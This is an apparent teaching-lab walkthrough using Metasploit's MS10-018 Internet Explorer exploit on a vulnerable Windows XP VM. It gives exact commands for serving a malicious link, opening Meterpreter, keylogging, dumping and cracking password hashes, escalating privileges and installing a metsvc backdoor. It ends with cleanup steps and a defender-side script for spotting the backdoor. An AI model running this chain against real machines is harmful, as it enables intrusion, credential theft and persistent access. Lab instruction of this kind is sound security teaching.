
(Metasploit: MS10-018)

{ BackTrack5R1: Create Malicious Link, Get Password, Set Backdoor }


Section 0. Background Information
  1. http://technet.microsoft.com/en-us/security/bulletin/MS10-018
    • This vulnerability could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.

  2. References
  3. Lab Notes
    • In this lab we will do the following:
      1. Use Metasploit to create a malicious link using the MS10-018 vulnerability.
      2. We will show how to take over Damn Vulnerable WXP-SP2 once the malicious link is clicked.

  4. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.

     

Section 1: Log into Damn Vulnerable WXP-SP2
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine

     

  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it to.

     

  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt

     

  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address is 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.

     

  7. Set Simple Administrative Password
    • Instructions:
      1. net user Administrator football

 

Section 2: Log into BackTrack5
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  3. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  4. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  5. Bring up the GNOME
    • Instructions:
      1. Type startx
Section 4: Bring up a console terminal
  1. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address is 192.168.1.111.
      • In your case, it will probably be different.

 

Section 5: Starting up the Metasploit MSF Console
  1. Start Up the Metasploit msfconsole
    • Instructions:
      1. msfconsole
    • Note(FYI):
      • Metasploit takes about 5 to 20 seconds to start up.

     

  2. Search for MS10-018
    • Instructions:
      1. search ms10_018
      2. use exploit/windows/browser/ms10_018_ie_behaviors

     

  3. Set Payload
    • Instructions:
      1. set PAYLOAD windows/shell/bind_tcp
      2. show options

     

  4. Set Required Variables
    • Instructions:
      1. set SRVHOST 192.168.1.111
        • Replace 192.168.1.111 with your BackTrack IP address obtained in (Section 4, Step 2).
      2. set URIPATH ms10_018.html
        • Setting URIPATH is optional, and the file name ms10_018.html is arbitrary.
      3. show options

     

  5. Start Exploit Server
    • Instructions:
      1. exploit
      2. Copy the Weblink (See Picture)
    • Note(FYI):
      • The aurora exploit is all set up.
      • The server is started and the daemon is listening.

 

Section 6: Exploiting Internet Explorer 6
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer

     

  2. Test Phishing Exploit
    • Instructions:
      1. Place the weblink you copied in (Section 5, Step 5) into the Address Bar.
        • E.g., http://192.168.1.111:8080/ms10_018.html
    • Note(FYI):
      • Replace 192.168.1.111 with your BackTrack IP address obtained in (Section 4, Step 2).

 

Section 7: Exploiting Internet Explorer 6
  1. Buffer Overflow Sent
    • Instructions:
      1. Press <Enter>
    • Note(FYI):
      • You can see that the MS10-018 exploit was sent to Damn Vulnerable WXP-SP2.

     

  2. View Sessions
    • Instructions:
      1. sessions -l
        • "l" as in larry.
    • Note(FYI):
      • The command "sessions" lists all the active connections between the attacker, BackTrack (192.168.1.111), and the victim, Damn Vulnerable WXP-SP2 (192.168.1.116).

     

  3. Create New Meterpreter Session
    • Instructions:
      1. setg LHOST 192.168.1.111
        • Sets LHOST globally (for every module in this console) to the local host's IP address, which the victim connects back to for the reverse communications needed to open the Meterpreter session.
        • Replace 192.168.1.111 with your BackTrack IP address obtained in (Section 4, Step 2).
      2. sessions -u 1
        • "1" as in the number 1.
    • Note(FYI):
      • The command stager will start uploading the Meterpreter payload. After "Command Stager progress" reaches 100% done, press <Enter> once to get back to the prompt.

     

  4. Interact with the Meterpreter Session
    • Instructions:
      1. Press <Enter> to get a prompt
      2. sessions -l
        • "l" as in larry.
        • Notice there are now two sessions: (1) Shell and (2) Meterpreter.
      3. sessions -i 2
        • "-i" means to interact

 

Section 8: View Processes
  1. View Processes
    • Instructions:
      1. ps

 

Section 9: View Tools/Possibilities
  1. View Tools/Possibilities
    • Instructions:
      1. run <space><tab><tab>
        • <space> means hit the space bar once.
        • <tab> means hit the tab key, which needs to be pressed twice.
      2. y
      3. Keep Pressing the Spacebar until all the choices are listed.

 

Section 10: run keylogrecorder
  1. Run keylogrecorder
    • Instructions:
      1. run keylogrecorder
    • Note(FYI):
      • Notice the message that says the keystrokes are being saved to a file.
      • Record the name of that file.

     

  2. Start Up Notepad (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Start --> All Programs --> Accessories --> Notepad

     

  3. Test the key logger recorder
    • Instructions:
      1. In notepad, type whatever you want.
      2. Continue to next step

     

  4. Test the key logger recorder (On BackTrack5R1)
    • Instructions:
      1. Copy the keylogrecorder file name (See Picture)
      2. Press <Ctrl>+c to stop the keylogrecorder

     

  5. Start Another Terminal
    • Instructions:
      1. Click on the Terminal Icon

     

  6. View Key Log Recorder
    • Note(FYI):
      • Replace the highlighted file below with yours, obtained in (Section 10, Step 4).
    • Instructions:
      1. cat /root/.msf4/logs/scripts/keylogrecorder/192.168.1.116_20130415.5300.txt

 

Section 11: run scraper
  1. Run Scraper
    • Note(FYI):
      • Don't be alarmed if you see an error after you see the password hashes were dumped.
      • Note, this could take up to 5 minutes to run.
    • Instructions:
      1. run scraper

     

  2. Start Another Terminal
    • Instructions:
      1. Click on the Terminal Icon

     

  3. View Hash File
    • Instructions:
      1. find /root/.msf4/logs/scripts/scraper/* -print
        • This will show you a list of files that were scraped from Damn Vulnerable WXP-SP2.
      2. cat /root/.msf4/logs/scripts/scraper/*/*hash*
        • This contains all the password hashes on Damn Vulnerable WXP-SP2.
      3. grep -h Admin /root/.msf4/logs/scripts/scraper/*/*hash* > /var/tmp/admin_hash.txt
        • Extract the Administrator password hash
      4. ls -l /var/tmp/admin_hash.txt

     

  4. Crack Password with John the Ripper
    • Instructions:
      1. cat /dev/null > /pentest/passwords/john/john.pot
      2. /pentest/passwords/john/john /var/tmp/admin_hash.txt

 

Section 11: Install Backdoor (metsvc)
  1. Escalate Privileges and Install metsvc
    • Instructions:
      1. getsystem
        • The "getsystem" command attempts to escalate the session to SYSTEM privileges.
      2. run metsvc
        • The "run metsvc" command installs a backdoor service on the Victim Machine.
      3. Record the temporary installation directory (See Picture)
        • In my case, it is kyKvcFtW

     

  2. View metsvc.exe process
    • Instructions:
      1. ps
        • Hunt for the metsvc.exe process to make sure it is running.

     

  3. Exit From Metasploit
    • Instructions:
      1. exit
        • Shutdown Meterpreter
      2. exit -y
        • Stop Server

     

  4. Start Metasploit Console
    • Instructions:
      1. msfconsole

     

  5. Connect to Backdoor (metsvc.exe)
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD windows/metsvc_bind_tcp
      3. set LPORT 31337
      4. set RHOST 192.168.1.116
        • Replace 192.168.1.116 with Damn Vulnerable WXP-SP2's IP Address obtained in (Section 1, Step 6).
      5. exploit

 

Section 12: Upload Fake Virus
  1. Start Another Terminal
    • Instructions:
      1. Click on the Terminal Icon

     

  2. Create Pretend Virus File
    • Instructions:
      1. cd /var/tmp
      2. touch pretend_virus.txt

     

  3. Upload Fake Virus
    • Instructions:
      1. upload /var/tmp/pretend_virus.txt C:\

 

Section 13: Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. cd ../../
      2. dir | findstr virus
      3. netstat -nao | findstr 31337
      4. date /t
      5. echo "Your Name"
        • This should be your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle

 

Section 13: Clean Up Victim Machine
  1. Exit Metasploit (On BackTrack5R1)
    • Instructions:
      1. exit
      2. exit -y

     

  2. Change the Administrator Password (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. net user Administrator NewPassword
        • Replace the string "NewPassword" with your previous password.

     

  3. End Metsvc Processes
    • Instructions:
      1. tasklist 2>NUL | findstr "metsvc*"
        • NUL is the Windows null device; "2>NULL" would instead create a file named NULL.
      2. taskkill /F /PID 3328
        • Replace 3328 with the PID associated with metsvc.exe
      3. taskkill /F /PID 440
        • Replace 440 with the PID associated with metsvc-server.exe
      4. tasklist | findstr "metsvc*"
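As an added defender-side check (example code written for this page, not part of the original lab): the script below parses `netstat -nao` and `tasklist` output in the layout the Windows XP victim produces and correlates them, flagging every process with a metsvc image name or a listener on the backdoor port, so the PIDs for the `taskkill` step are found rather than read by eye. The sample output is constructed, and the port 31337 and the image names metsvc.exe / metsvc-server.exe are assumptions of this example.

```python
import re
BACKDOOR_PORT = 31337  # LPORT the lab's metsvc_bind_tcp handler connects to
METSVC_NAMES = {"metsvc.exe", "metsvc-server.exe"}  # assumed metsvc image names
# Constructed sample output (not captured from the lab) in the layout of
# `netstat -nao` and `tasklist` on the Windows XP victim after `run metsvc`
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       940
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       440
  UDP    0.0.0.0:445            *:*                                    4
"""
TASKLIST_SAMPLE = """\
Image Name                     PID Session Name     Session#    Mem Usage
========================= ======== ================ ======== ============
System Idle Process              0 Console                 0         28 K
metsvc.exe                    3328 Console                 0      1,204 K
metsvc-server.exe              440 Console                 0      2,108 K
"""

def parse_netstat_listeners(text):
    """Map PID -> list of TCP ports in LISTENING state (UDP rows skipped)."""
    listeners = {}
    for parts in (line.split() for line in text.splitlines()):
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])
            listeners.setdefault(int(parts[4]), []).append(port)
    return listeners

def parse_tasklist(text):
    """Map PID -> image name; the header and ===== rows do not match the regex."""
    row = re.compile(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K$")
    return {int(m.group(2)): m.group(1).strip()
            for m in map(row.match, text.splitlines()) if m}

def find_metsvc_backdoor(netstat_text, tasklist_text, port=BACKDOOR_PORT):
    """Return sorted (pid, image, reason) for every known metsvc image name or
    backdoor-port listener; a listener whose PID is not in tasklist is kept."""
    listeners = parse_netstat_listeners(netstat_text)
    procs = parse_tasklist(tasklist_text)
    findings = []
    for pid in set(procs) | set(listeners):
        reasons = []
        if procs.get(pid, "").lower() in METSVC_NAMES:
            reasons.append("known metsvc image name")
        if port in listeners.get(pid, []):
            reasons.append(f"listening on TCP {port}")
        if reasons:  # these PIDs are the targets of the taskkill step above
            findings.append((pid, procs.get(pid, "<unknown>"), "; ".join(reasons)))
    return sorted(findings)
```

Feed it the real output of the two commands (redirected to files) and each finding's PID is the value to pass to `taskkill /F /PID`.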

     

  4. Delete Metsvc Backdoor
    • Instructions:
      1. In Windows Explorer, navigate to the following directory:
        • C:\Documents and Settings\Administrator\Local Settings\Temp
      2. Left Click on the metsvc directory name obtained from (Section 11, Step 1, Instruction 3).
      3. Click Delete
      4. Click the Yes Button to Confirm Folder Delete Message

 


